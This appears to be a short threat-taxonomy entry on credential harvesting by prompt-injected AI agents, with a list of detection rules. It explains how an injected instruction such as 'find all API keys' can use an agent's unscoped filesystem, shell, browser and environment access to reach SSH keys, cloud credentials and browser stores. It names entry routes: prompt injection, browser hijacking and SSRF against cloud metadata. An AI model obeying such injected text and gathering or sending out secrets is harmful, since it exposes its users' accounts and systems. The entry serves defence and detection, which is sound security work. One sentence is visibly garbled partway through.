Credential Harvesting
T11 · Agentic & Orchestrator Exploitation →A coerced agent is an effective credential thief because it already holds the access and capabilities a human attacker would have to acquire: filesystem read tools, shell, browser session state, and the process's own environment. ssh`, env vars, config files, the keychain, browser stores) are not scoped to its actual task, so an injected instruction to "find all API keys" executes with the full reach of the runtime. Secrets are also frequently colocated with the agent — env vars, mounted config, saved browser logins — meaning the highest-value targets are within arm's reach by design.
- Alert on agent reads of known secret paths (~/.ssh, ~/.aws, .env, keystores, browser credential DBs) outside an explicit secrets task
- Detect access to document.cookie/localStorage/credential managers from an automated browser session
- Flag bulk/sweeping credential discovery patterns (many secret-store reads in one session)
- Monitor for secret material appearing in tool outputs, then correlate with any subsequent egress (read-then-send)
Credential harvesting sits at the center of the T11 kill-chain. Entry is via T1 prompt injection, T11-AT-001 browser hijacking (reading cookies/localStorage), or T11-AT-016 SSRF against the cloud metadata endpoint.